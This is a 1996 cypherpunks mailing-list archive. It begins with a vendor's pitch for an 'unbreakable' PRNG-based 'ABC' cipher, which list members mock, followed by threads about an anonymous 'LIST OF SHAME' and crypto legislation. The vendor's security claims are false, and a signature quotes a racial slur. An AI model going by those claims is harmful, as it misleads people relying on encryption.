        impossible to break the Ultima system, other equally difficult  
        to break systems may exist, or may be formulated in the future,
        for example a true OTP,  and in those cases, they may 
        "theoretically" be more difficult to break than the IPG Ultima 
        System, for example a true OTP. However, that would exist only in 
        theory, because in those eventiualities, none of the 
        systems would be breakable.
        
        Furthermore as to speed, Ultima, or simple variations, XOR, OR,
        or AND, instead of the Add or Subtract, is the fastest possible 
        algorithm which will produce an unbreakable encryption system, 
        without having a single OTP byte for each byte of plain text to be 
        encrypted, as in an OTP. However, with the IPG system, we can 
        obtain the same speed, or theoretically faster speeds than a pure 
        OTP, with some very simple parrallelism - and that begs how 
        you get humoungous OTPs to use, both in terms of generating 
        them and getting them into a stream to be XORed against the plain 
        text. That FACT, that the IPG algorithms are the fastest 
        possible encryption system which will become evident when you 
        examine the algorithms in detail. 
  
        Thus it is impossible to produce a better system, in terms of 
        either security or speed, thus we call our system Ultima, the 
        ultimate.

    2.  The use of the term ABC Encryption algorithm that at once 
        describes the basics of the system and its simplicity as will 
        quickly become evident.


    3.  The use of a hardware generated OTP, which serves as a purely 
        random seed, for the system to be described.

    4.  The use of a table of prime numbers, any number of which is greater 
        than 3, from which random selections are made to be used in the 
        algorithms to be described. The prime numbers for the system 
        described have been selected for a specific hardware, namely the 
        IBM PC clone, market. With other 16 bit, 32 bit, or 64 bit 
        hardware, other prime numbers could be used to provide immediate 
        results just as in the system to be described. The use of 
        larger numbers, the use of larger adders, or logic gating 
        systems, is self evident in the copyrights/patents.    

    5.  The use of a random 8 bit seed for the dynamic vaiable that links 
        the sets of equations into one system. This variable, D, for 
        dynamic is the real key that distinguishes our system from any 
        other system - excepting hardware implemented systems that use 
        extremely large numbers, and or possible partitions, that 
        encompass possible meaningful message lengths. Such systems, are 
        self evident extensions of the simple IPG system.
  
    6.  The use of partitions within one OTP, pure random seed, PRNG stream 
        - either by using parts of the random seeds, or more 
        likely by using fixed intervals within the PRNG stream, for 
        example, arbitrarily say every 100 gigabytes, or 100 terabytes for 
        that matter. Using this technique, one random seed can be used for 
        any abritrary period of time, one message, 10 messages, one day, one 
        week, one year, one century, one millenium or whatever.  The use 
        of multiple Ds, in linear partitions, that is within one otp 
        every terabyte fior example,  is a self evident extension of the 
        IPG system. 

    7. The use of a simple serial hardware implementation of the IPG 
        system is self evident, and produces impressive speeds, mutiple 
        megabyte per second, dependent of course on hardware speeds.

    8. The use of a very simple single level of parallelism in hardware 
       implementation, where the ABCs are computed in parrallel, and 
       the D is passed along, is a simple self evident extension 
       of the system and will allow a throughput of over 
       100 megabytes per second, on state of the sart hardware.

    9. The use of a three dimensional parallel system, where the PRG 
       stream is chopped up into several partitions, say every terabyte, 
       and then each module proceeds as in paragraph 8, just above, is a 
       simple extension of the basic IPG system, a would enable a system 
       to operate at any conceivable line speed. 

   10. The changing of the number of equations, modules, prime number 
       values, length of prime numbers, or length of random sample, probe 
       values, or the other algorithmic values does not change  the basic 
       algorithm. It is the same algorithm with different values.  



With the previously detailed claims relating to the copyrightable and  
patentable features of the IPG algorithm system, IPG prersents 
the the Ultima Algorithms. - the ABC Encryption system.

Given:

    1. A 1792 BIT OTP, RANDOM SEED, generated from a hardware 
       source.

    2. A Table of 319 Prime Numbers in the range of 6,667 to 11,997, out 
       of the 580+ available, the 384 selected for dynamic variance, 
       the table is called BPRIMES.

    3. A Table of 319 prime numbers in the range of 14,007 to 19,997, out 
       of the 800+ available, the 384 selected for dynamic variance, 
       the table is called CPRIMES 


       The 1792 bits of OTP, Random Seed, are allocated as follows. 

          1. 512 bits for the 64 probes, for 64 C vales
          2. 512 bits for the 64 probes, for 64 B values
          3. 512 bits for the 64 starting A values 
          4.   8 bits for the initial ID value.

          Those 1544 bits are the actual random seed used for generating 
          the PRNG stream, if you insist on calling it that. In addition, 
          there are 248 bits used as follows.  

          5. 128 bits for the offset, partition, if applicable into the 
             PRNG stream. Actually they are used to encrypt the 
             actual underlying value of the partition, if any - note - in 
             this case the mode is actually a true OTP, the first time 
             only ot really does not help to know the offset unless 
             you know the OTP, Random Seed. 
          6. 72 bits for uniquely identifying the OTP being used.
          7. 48 bits as spares temporarily - can be used as different D
             values for partitions. If more As, Bs, Cs, are needed the 
             random seed, OTP, can be expanded as necessary. Unlike RSA, 
             there is no practical limit - I am actually sending you 1792
             BYTE Random seeds, so that you can test other variations if you 
             like, or use each of them, there are 32 of them in all, as 8 
             random seeds for the 1792 bit algorithm.  
   
       8 bit random starting A values are sufficient because we are 
       only talking about the effect on the low order 8 bits in our PRNG 
       stream. We actually AND these values with the constant 13,568 
       to give us a start that will intially have a dynamic effect 
       on the A, B, and C values, that is the smallest possible 
       B+13568, exceeds that largest possible C value.       
       
       This selection process of course makes the A, B and C values 
       random, 8 bits, as well as the initial ID value - the random range of 
       each set is 2 to 32 but as you will see they are interlimked 
       with the Dynamic variable, D.  

  The procedure is as follows:

      1. Using the 64 bytes for B selection, we select 64 Bs,
         B1,..,B64,  as follows.

         B1=BPRIMES(SB1) WHERE SB1 is the first byte of the Random Number 
            Seed, thus B1 is one of the BPRIMES, BPRIMES(0),..BPRIMES(255)
            then
         BPRIMES(SB1)=BPRIMES(256)   
             then
         B2=BPRIMES(SB2) AS BEFORE EXCEPT Byte 2 of the OTP, Random Seed, 
            is used. 
            then  
         BRPIMES(SB2)=BPRIMES(257) 
         and so forth through 64

        Thus you have 64 constants, B1,..,B64, each of which is an unique 
        prime number. This of course, is the same as a lottery selection, 
        except there is no denominator and the section pool does not 
        shrink. Thus you have 1 in 2 to the 512 possibilities of a 
        repeat, or guessing the selections. 

     2. The same procedure is used for selecting 64 C values, C1 through 
        C64.       
      
     3. The 64 starting A byte values, from the random seed, are 
        ANDed to 13,568 to give the 64 starting A values, random, at least 8 
        bit random.

     4. 8 Bits are used for the starting D value
  
     Thus the B  and Cs are constants - the As and D changes   

     Then quite simply, you have 64 equation sets as follows. 

     A1=(A1+B1) MOD C1  (Move, Add, Compare, Conditional Subtract)    
     D=(D+A1) AND 255  (Really just use DL in assembly language)
          + 
     A2=(A2+B2) MOD C2
     D=(D+A2) AND 255 
     ..............
          + 
     A63=(A63+B63) MOD C63
     D=(D+A63) AND 255 
          +
     A64=(A64+B64) MOD C64    
     D=(D+A64) AND 255
     
     the XOR operation against the plain text may vary. In our case, we 
     accumulate a pair of DLs in CX, and then XOR it against a wor, two 
     bytes of plain text. Thus we have one XOR for each set of two 
     equations above, 32 XORs for the 64 equations. We string A1 type 
     8 sets of those 64 equations together,  essentially duplicates of each 
     other except for the XOR operation, which are constants, as opposed to
     indexed variables. Thus we do a disk sector at a time, with only the 
     A values and D being variables. With double buffering, you can see 
     that it cooks, to say the very least.  
      
     Obviously by definition, there can be no repeat before the product of 
     the C values, that is (C1*C2*C3,..,*C63*C64), and that does not take 
     into account the starting A values and the starting D value. The 
     average C value is slightly over 14 bits. Accordingly, no repeat 
     is possible before 2 to the 864th power,minimum, or 2 to the 
     896th power average, 10 to the 267th power minimum, which will handle 
     anything that can possibly occur, ever, ever, ever. If every atom in 
     the universe was a Googol of Cray T3E's and they had been computing 
     since the big bang, the possibilities they would have tried so far 
     would be less than 1 part in 1 Googol. And that does not take into 
     account the other 2 to the 1543+ possibilities. 

     There is absolutely no way to prove that any message of any possible
     length is or is not possible, without trying all of the 1 to the 
     470th power possibilities, which of course is impossible. As John 
     von Neumann once said to Dr. Bloome (Dottie), in my presence - it 
     in a similar but totally unrelated case, it is not enough to say 
     that it some theoretical message may not be theoretically possible, you 
     must prove that at least one specific message is not possible.  Of 
     course, like JvN's case, that is not possible in the case of the IPG 
     system.     

  Continuing along that line, we in recognize that because we are 
  working with a 1544 bit key, over 2 to 1543, but someewhat less than 2 
  to the 1544, that we only have approximately 10 to the 478th 
  possibilities, that is 2 to the 1543+. Thus with a 125,000 byte message,
  we do not have 2 to 1,000,000th possible keys, but only 2 to the 1544 
  possible PRNG streams. Having said that, and fully recognizing that as
  incontrovertible, we invite you to test a long PRNG generated stream
  by the method, using a truly random seed of 1544 bits. You will 
  find over both short and long sample sizes that the "effect" is 
  indistinguishable from an OTP of the same length. 

  To facilitate this, we are including herewith: 


I combined all these files listed below under BSD UNIX with the zip 
program so you shouldn't have any problems extracting them. If you do,
please get back in touch with us and we can re-send the file under a 
different format, PKZIP. 

Note: The zipped files are considerably larger than the original 
      because they are random unzippable data files.

I promise you that with these, you can write the program to generate 
the PRNG streams in somewhat less than two hours. I am referring to the
64 sets of the equations set out above:

This approach will  also demonstrate how incredibly fast the system is 
and also how incredibly secure it is. 

 Therefore, please find attached in the zipped file BINARY.ZIP
 consisting of:

 
   1. BPRIMES.DAT - 384 prime numbers used for randomly selecting the 
      B1,..,B64 values in what we are now calling the 1792 bit system - I 
      am including 384 instead of 319 in case you want to try variations.. 

   2. CPRIMES.DAT - 384 prime numbers used for randomly selecting the
      C1,..,C64 values in the 1792 bit system - again 384 in case yopu 
      want to try variations.

   3. 32 - 1792 BYTE Hardware generated OTPs, specifically  
      OTP.001,..,OTP.032. - any of these may be used in the 1792 BIT 
      system, or the 5600 BIT system, or the 12288 BIT system. Further, 
      any of the 32, can be used for other possible system 
      configurations. The L1792 BYTE OTPs, can also be broken down 
      into 8 - 1792 BIT OTPs.


With these variables, you will not have any problem doing any 
kind of test that you may desire.

As a prelude, consider, if you will, the 1st 64 bytes of the PRNG stream.

    1. Byte 1

       D is random 
       A1=(A1+B1) MOD C1: is where A1 is random, 8 bit, and B1 and C1 are 
           randomly selected  from a table of primes and become a 
           constant for that OTP, random seed. THE resultant A1 is some 
           indeterminate number between 0 and C1-1. A1 MOD 256 is 
           therefore likewise some random number between 0 and 255.
           There are 16,677,216 possible variations, and only 1 is the 
           actual.   
       ID=(ID+A1) AND 255. ID is random and A1 is pseudo random with 
           16,677,216 possible variations.

       Accordingly: by definition the new TD is random.     
       
       Now therefore: if D was used for only this equation, there 
           would only be 2 to the 32nd possible, 8 ID - 8 A1 - 8 B1 
           & 8 C1 possible variations and what you would have would 
           be a system partioned into 64 didfferent subsystems. However,
           that is obviously not the case, D is passed from one 
           equation set to the next, so there is no repeat possible until at 
           the very least  ID short of the entire C1*C2,..*C63*C64 cycles.
       
   
     2. Byte 2, The process is the same and the resultant ID is 
        random.

     The process is the same for all the other 62 bytes. 

     Accordingly, how is it possible to determine the first 512 bits of the 
     PRNG stream? That is 10 to the 158th power possibilities. Obviously 
     they cannot all be tried - and any of the possible 2 to the 512th 
     power of underlying clear text is possible. 

     As stated, the reultant system is absolutely unbreakable - no ifs, 
     no ands, no buts, no maybes, no anything. Also, as you can clearly 
     demonstrate for yourself, there is no more robust system, with 
     respect to speed, possible. It is truly Ultima, the ultimate 
     system, as you will find out for yourself.   

     Enough, I assume. After you have satisfied yourself that the ABC 
     Encryption system is absolutely unbreakable and the fastest system 
     possible. We will proceed to the demonstrate that the Key 
     distribution is no problem and as stated, we are willing to license  
     the process as desired by users. 
        
  I invite your response,

  Thanks so much,

  Ralph,

      
  



John Pettitt, jpp@software.net
VP Engineering, CyberSource Corporation, 415 473 3065
 "Technology is a way of organizing the universe so that man
  doesn't have to experience it." - Max Frisch

PGP Key available at:
http://www-swiss.ai.mit.edu/htbin/pks-extract-key.pl?op=get&search=0xB7AA3705





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robb@SpeakOut.org (Robb Hill)
Date: Thu, 21 Mar 1996 01:39:20 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <v01530500ad75c3609857@[206.66.171.67]>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know of a Visual Basic/Quick Basic implementation of the Unix
Crypt(3) function used to hash passwords.  I have not found any crypto
source code in VB.  Your help in this search is greatly appreciated.  If
you would like E-Mail me direcly , Robb@Speakout.org.

Many Thanks,

Robb Hill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fred <admin@dcwill.com>
Date: Thu, 21 Mar 1996 04:52:31 +0800
To: cypherpunks@toad.com
Subject: Re: IPG message
In-Reply-To: <2.2.32.19960320161456.012102e0@mail.software.net>
Message-ID: <199603201752.JAA05334@python.ee.unr.edu>
MIME-Version: 1.0
Content-Type: text/plain



> IPG wrote:

> Obviously, you meet our requirementsfor the release of the IPG ABC 
> Encryption algorithms. We need no further information from you. though we 

Obviously, "ABC" stands for "Already Been Cracked".


Fred  <admin@dcwill.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Thu, 21 Mar 1996 12:09:17 +0800
To: declan@well.com
Subject: [NOISE] Re: Dorothy Denning attacks Leahy's crypto bill
In-Reply-To: <Pine.3.89.9603192113.A23263-0100000@well>
Message-ID: <OtEUx8m9LshX085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.3.89.9603192113.A23263-0100000@well>,
Declan McCullagh <declan@well.com> wrote:

> I may have to adjust my position on Leahy's bill. Any legislation that
> Dorothy Denning attacks so virulently must be worth passing. 

That could be exactly what They want you to think!

If They wanted us to overlook the actual flaws and trapdoors in Leahy's 
bill, what better way than to have our knees jerk in support by arranging
for Denning's opposition?

- -- 
Alan Bostick               | I'm laughing with, not laughing at.
mailto:abostick@netcom.com | The question is, laughing with WHAT?
news:alt.grelb             |      James "Kibo" Parry <kibo@world.std.com>
http://www.alumni.caltech.edu/~abostick

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMVBL5uVevBgtmhnpAQG44wL9H9SCJGukqkXYbBT8mbPWp0aJxnJnDeKu
OHfbwwxnbcdpEpc7CaE3Gj9E5V9Tz2PV5L0eXK7su5gEa+UcGZ9vD1jL7ySVTnM3
y15gXFb90dOS2chbI4gKYyIEU8+MM41q
=7oBJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 21 Mar 1996 11:58:17 +0800
To: cypherpunks@toad.com
Subject: Re: A MODEST PROPOSAL
In-Reply-To: <199603201850.NAA08934@yakko.cs.wmich.edu>
Message-ID: <Pine.SUN.3.91.99.960320115537.26430B-100000@elaine40.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I would sign on, but I don't think you want to associate with a crypto-
jewish anarchist fucking statist nazi free-speech activist censor asshole
l. detweiler tentacle.

-rich
 Liberty is not a means to a higher political end. It is itself the
 highest political end.-- Lord Acton





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 21 Mar 1996 04:03:43 +0800
To: cypherpunks@toad.com
Subject: Re: Keep the pressure! Cryptographers Against Cryptography EXPOSED!
In-Reply-To: <199603201013.CAA08914@jobe.shell.portal.com>
Message-ID: <199603201705.MAA01423@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



anonymous-remailer@shell.portal.com writes:
> Some people have wondered why I am anonymous and attack me.
> I am not ashamed of my views.

Well, then you should be.

> I write this thread anonymous as a form of protest.

Why is it a form of protest? If you aren't ashamed, post it under your
name.

> The 10 PEOPLE on the LIST OF SHAME have their shields.

Why am I not on the LIST OF CAPITALIZED, oh, pardon, LIST OF SHAME. I
feel excluded. 

> I have an acount and post regularly under my real name. I am not
> ashamed of my views. I am proud of them.

If you aren't ashamed of posting this, post it under your own name.

> I write this anonyously as a form of protest because they have
> there shield

What shield?

> I WANT TO KEEP IT THAT WAY! THEY MUST NOT BE ALOWED TO TAKE OUR SHIELD AWAY.

I was unaware that anyone on your list was in favor of eliminating
remailers.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 21 Mar 1996 04:39:15 +0800
To: cypherpunks@toad.com
Subject: Re: Keep the pressure! Cryptographers Against Cryptography EXPOSED!
In-Reply-To: <199603201016.CAA09094@jobe.shell.portal.com>
Message-ID: <199603201726.MAA01438@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



anonymous-remailer@shell.portal.com writes:
> THEY MUST BE STOPPED.

Yup, really evil folks. Lets go over some of the people on your list.

> THE LIST OF SHAME:
> B. Schneier: bs208@newton.cam.ac.uk, schneier@counterpane.com

Bruce Schneier, cryptographic privacy advocate, cryptographer,
publisher of "Applied Cryptography", the book that signaled the end of
the NSA's ability to keep information on how to build cryptosystems
out of the hands of most people. A smart 14 year old, armed with a C
compiler and Applied Cryptography, cannot be prevented from writing
good cryptographic software. Is this the NSA enemies list, by chance?

> M. Blaze: mab@crypto.com, mab@research.att.com

Matt Blaze, cryptographer, privacy advocate, anti-authoritarian. The
guy who showed that Tessera/Fortezza cards were flawed and embarassed
the NSA in public with it. Regularly releases strong cryptographic
tools to the public. Participated strongly with me and others in early
efforts to build software only "voice crypto" systems. Tirelessly
criticizes control on cryptographic software. Is your list of
"enemies" supplied by the NSA?

> J. Bizdos: jim@rsa.com

Well, I'm not going to defend Jim. Besides, he can take care of
himself. However, although he isn't necessarily a friend of
cypherpunks, he's no friend of control of cryptography by the
government, which would put him out of business.

> S. Safaddar: shabbir@vtw.org

Shabbir: creator of voters telecom watch; privacy advocate, tireless
opponent of the CDA, free speech restrictions, network regulation, and
any other attempt at stopping freedom on the net. Shabbir is not a guy
you would call an advocate of authoritarianism.

> B. Stewart: stewarts@ix.netcom.com

Bill Stewart: "Hippie Anarchist"; he and his wife, Laura, are about
the most anti-government folks I think you are likely to find this
side of Alpha Centauri. Bill is as libertarian as they come, and
unconditionally opposes any attempts at restricting anyone's freedom
to live peacefully. The idea that he'd advocate anything that
increased the power of government is absurd. One of the nicest people
I know.

> P. Karn: karn@unix.ka9q.ampr.org

Phil Karn: Engineer's Engineer, crypto-hacker, privacy advocate. Phil
is suing the government right now to get the right to export
cryptographic software freely -- he has gone through a lot of trouble
to try to prove you have a constitutional right to distribute
cryptographic software and to prove that if you can ship it in print
you can ship it on disk. Phil ceaselessly advocates the use of strong
cryptography by everyone, and is one of the people who built the
predecessor of the current IETF IPsec standard. Phil worked very hard
on creating the Photuris key exchange protocol, which takes care to
make sure that all parties remain anonymous to eavesdroppers. Phil has
released large amounts of strong cryptographic code to the public,
including the fastest implementation of DES ever seen in
software. After an NSA flack spoke about his nightmare of every $80
digital phone on earth having unbreakable crypto in it, Phil quipped
something like "well, folks, now we know our design goal." Phil
tirelessly spreads the gospel of PGP. In short, he isn't on anyone's
short list of "friends of the NSA".

> D. McCullagh: declan@well.com
Declan is a tireless advocate of free speech, going so far as to work
hard to distribute speech he highly disagrees with if it is being
censored. I don't know him personally, but he hardly fits the profile
of "Friends of the NSA" or some such.


In short, Mr. Anonymous, you couldn't have picked a bigger bunch of
"Enemies of the NSA" for your "Friends of the NSA" list if you had
been explicitly instructed to pick the biggest opponents of
controls on cryptographic software and write them down. My question to
you is this: are you just stupid or ornery, or is the NSA paying you
for this?

Perry
Who is disappointed that he didn't make the "LIST OF SHAME", but
understands that perhaps he hasn't done enough to oppose controls on
cryptography. I'll work harder, and hopefully you will denounce me
soon.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Thu, 21 Mar 1996 15:48:24 +0800
To: jpp@software.net
Subject: [NOISE] Re: IPG message
In-Reply-To: <2.2.32.19960320161456.012102e0@mail.software.net>
Message-ID: <+EHUx8m9L43I085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <2.2.32.19960320161456.012102e0@mail.software.net>,
John Pettitt <jpp@software.net> wrote:

> IPG wrote:
> 
> The algorithms detailed below are copyrighted 1995 and 1996 by Internet 
      ^^^^^^^^^^                    ^^^^^^^^^^^
> Privacy Guaranteed, Seymour, TX. All rights are reserved. 

These clowns are claiming *copyright* protection for *algorithms*???!!

*ROTFLMAO!*

Alan "This message encrypted with ROTFL-13" Bostick

- -- 
Alan Bostick               | I'm laughing with, not laughing at.
mailto:abostick@netcom.com | The question is, laughing with WHAT?
news:alt.grelb             |      James "Kibo" Parry <kibo@world.std.com>
http://www.alumni.caltech.edu/~abostick

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMVByguVevBgtmhnpAQFfGAMAk9cqE8lsHZ73rjXisn0gMcKAheo03fyh
zepiu6pfF/wIG5ahuBJB7iw/4KtW7fEDthy5AAtkjj0mZyPzPajyzT/THEnkhla9
eWlN6KNwrsQiM3+xJrhzVu+BxqYbB54x
=WYBg
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 21 Mar 1996 18:29:33 +0800
To: cypherpunks@toad.com
Subject: Upside's TAMING THE INTERNET: Special Report
Message-ID: <Pine.SUN.3.91.960320125401.28875C-100000@elaine40.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


[Who says it needs to be tamed?]

Page 78 of the April issue: "Stephen Arnold, author of the recent book
_Publishing on the Internet: A New Medium for the New Millenium_ [gag],
dispels some of the mystery and myth surrounding on-line security,
assesses its current state, and looks forward to new technologies." 

www.upside.com. Interviews with Bill Gates and other "luminaries." 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Thu, 21 Mar 1996 05:29:00 +0800
To: sandfort@crl.com (Sandy Sandfort)
Subject: Re: A MODEST PROPOSAL
In-Reply-To: <Pine.SUN.3.91.960320063446.5470A-100000@crl13.crl.com>
Message-ID: <199603201850.NAA08934@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain


Sandy Sandfort writes:
> 
> (Did I get the style right?)  C'punks, if you feels as I do, 
> please take a few moments to sign up for the LIST OF SHAME?  
> Let's show Bill, Bruce, Matt and all the others what most 
> Cypherpunks really think about them and Mr/Ms Anonymous.

What the hell; it can't be any worse than being on Demopublican
mailing lists. Sign me an offended customer.

--
The word "gaijin" literally means "foreign person". Many Westerners like to
think that the Japanese use it in the same way as the Grand Dragon of the Ku
Klux Klan uses "nigger", but it ain't really true. They use it when they mean
"nigger", but they also sometimes use it to mean "honorable nigger".
 - Bill Lambert in soc.couples.intercultural





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Bell <quester@eskimo.com>
Date: Fri, 22 Mar 1996 04:18:09 +0800
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: Shameless
In-Reply-To: <Pine.SUN.3.91.960320063446.5470A-100000@crl13.crl.com>
Message-ID: <Pine.SUN.3.91.960320135357.17338C-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Mar 1996, Sandy Sandfort wrote:

> > 
> > BOYCOTT APPLIED CRYPTOGRAPHY, AT&T, VTW, and RSA!!!!
> > 
> > THE LEAHY BILL IS 100% PART OF THE PLAN TO KILL FREE CRYPTO.
> > YOU DON'T NEED EXPERTS TO THINK FOR YOU! REMEMBER RICO AND WORLD GOVERNMENT!

(...)
> 
> 
> I am totally put off by the gradiose and 
> devisive ravings of this commentator.  


Uh-huh.  And Perry said something about how the `list of shame' looks 
like an NSA enemies list.

Why do I sniff a scent of `provocateur'?  Is it just in my nose?

Charles Bell 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 21 Mar 1996 06:40:06 +0800
To: cypherpunks@toad.com
Subject: JEK_hyd
Message-ID: <199603201914.OAA10636@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   3-20-96. TWP (privatizing the global NatSec frankenstein):

   "South Africa Weighs Reining In Peddlers of Mercenary
   Ex-Soldiers."

      In this once highly militarized society, the transition
      from white-minority rule produced unemployed commandos
      and spies suddenly without a cause. So, controversial
      military and intelligence units are selling their skills
      to the rest of Africa and beyond. Executive Outcomes,
      the best known and apparently largest of firms offering
      overt and covert security services, says the company's
      services are in great demand. It operates within a murky
      network of other international companies that specialize
      in oil drilling, diamond mining and landmine removal.
      The firm also has been reported to hire former commandos
      of Britain's SAS and the Selous Scouts of the old
      white-ruled Rhodesia, as well as military technicians
      from the former Soviet Union.

   JEK_hyd






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Thu, 21 Mar 1996 18:31:16 +0800
To: John Pettitt <jpp@software.net>
Subject: Re: IPG message
In-Reply-To: <2.2.32.19960320161456.012102e0@mail.software.net>
Message-ID: <Pine.SUN.3.91.960320144152.2221X-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


correct me if I'm wrong, but don't the federal direct mail marketing laws 
say that any unsolicited merchandise sent to a person becomes their 
property, regardless of any disclaimers to the contrary included in the 
package?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 22 Mar 1996 04:21:37 +0800
To: mccoy@communities.com (Jim McCoy)
Subject: Re: If you can't take the heat... (Was Re: Keep the pressure!)
In-Reply-To: <v02140b00ad761b8c3f61@[199.2.22.124]>
Message-ID: <199603202124.QAA02033@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim McCoy writes:
> What amuses me most about this series of rantings by whomever, other
> than the paranoid and baseless claims made by the anonymous poster,
> is the number of people who have been complaining about the author doing
> so anonymously through a remailer.  The irony of such a situation is
> too rich to pass up.

I have no problem with the existance of anonymous remailers, and I
don't want to see them banned or prevented -- indeed, I encourage
their existance.

However, that doesn't mean that I always favor their use, or that I
won't look down on someone for using one inappropriately.

To put it another way: I believe that every adult person has the right
to have sex with any other willing adult person. However, I think it
might not be tasteful if my neighbors decided to bugger each other on
the front lawn. Not, you understand, that it should be illegal, but it
does make me wonder about them.

In the case of the given poster, he claims that he's using anonymity
not because he fears backlash (he should but thats another story) but
as a form of "protest". This is as illogical as the content of his
messages...

> It seems that cypherpunks can dish it out when other newsgroups and
> mailing lists suffer such problems ("well, the remailers do nothing
> that telneting to port 25 cannot do..." or "internet identity is such
> a fiction anyway, get used to it"  seem to be common responses), but
> when the cypherpunks lists is the victim of unpleasant anonymous messages
> we fall back to the tired refrain of "if you have nothing to hide why
> are you posting anonymously."  How sad.

Why is this sad? I think you don't get the difference between what is
permissable and what is in good taste.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@azstarnet.com
Date: Thu, 21 Mar 1996 14:07:31 +0800
To: cypherpunks@toad.com
Subject: Re:( NOISE) Keep the pressure! Cryptographers Against Cryptography EXPOSED!
Message-ID: <199603210053.RAA07261@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


anonymous said:

> YOU DON'T NEED EXPERTS TO THINK FOR YOU! REMEMBER RICO AND WORLD GOVERNMENT!

Hmmm. I still don't get the "world government" bit,  but I finally think
that I "REMEMBER RICO".

1930's flick, Edward G. Robinson as a gangster about to be riddled with
bullets by the Feds has time for a closing line: "Mother of mercy, could
this be the end of RICO?"    ==OR==

(Please bear with me, I'm not up on all of "Their" conspiritorial methods)
Could it refer to the chicken liver and pasta dish known as "Spaghetti a la
(EnRICO) Caruso"?  I only had this dish once, but I'll remember it for a
long, long time.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JR@ns.cnb.uam.es
Date: Thu, 21 Mar 1996 01:39:06 +0800
To: cypherpunks@toad.com
Subject: Re: Keep the pressure! Cryptographers Against Cryptography EXPOSED!
Message-ID: <960320180034.2040307c@ROCK.CNB.UAM.ES>
MIME-Version: 1.0
Content-Type: text/plain


>Some people have wondered why I am anonymous and attack me.
>I am not ashamed of my views. I write this thread anonymous
>as a form of protest.
>
>The 10 PEOPLE on the LIST OF SHAME have their shields. The whole
>government will come to their aid in helping them spread their
>lie and is behind them.
>
	Have you considered visiting your GP or a psychiatrist? No,
seriously, that paranoia of yours may get worst and now it may still
be time to cure it.

	You better go now before it gets worst and you end killing
a President or something similar. Or at least, use your scarce brains
to think a bit (not much needed) to realize that even if these people
were of such conspiratorial taste they do have the same right to
express their opinions and wants as you do.

>I have an acount and post regularly under my real name. I am not
>ashamed of my views. I am proud of them.
>
	Oh, I see, that's why you keep using an anonymous remailer.

>I write this anonyously as a form of protest because they have
>there shield and we have our remailers. I WANT TO KEEP IT THAT WAY!
>THEY MUST NOT BE ALOWED TO TAKE OUR SHIELD AWAY.
>                                ^^^ 
	YOUR and who else? Aren't you generalizing a bit? And BTW
denying others any right to express themselves? Aren't you stablishing
as "me/us" vs. "THEM" where you mistify that "THEM"? Shouldn't you
consider if you're not going too far and really need medical assistance?

>BOYCOTT THE SELLOUTS
>AND
>DO WHAT YOU HAVE TO DO
>
	Boyz, do you consider the above concerns too. Before attempting
to follow advice of a possibly paranoid, ill, mental patient, consider
seriously if you are not really hurting yourselves.

	The latest thing a cypherpunk should do is enjoin conspiratorial
dementia and begin pursuing the very people that is actually supporting
cryptography, developing the crypto field and fighting for crypto rights.

	As he says, "do what you have to": ponder seriously the problem
and don't let anyone tell you what to do. Least of all "anonymous"
fundamentalists.

				jr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: webmaster@pepsi.com
Date: Fri, 22 Mar 1996 04:18:12 +0800
Subject: Pepsi World - Gotta Have It!
Message-ID: <199603210046.SAA11725@plwipc10.xweb.eds.com>
MIME-Version: 1.0
Content-Type: text/plain


Hey Squatter!

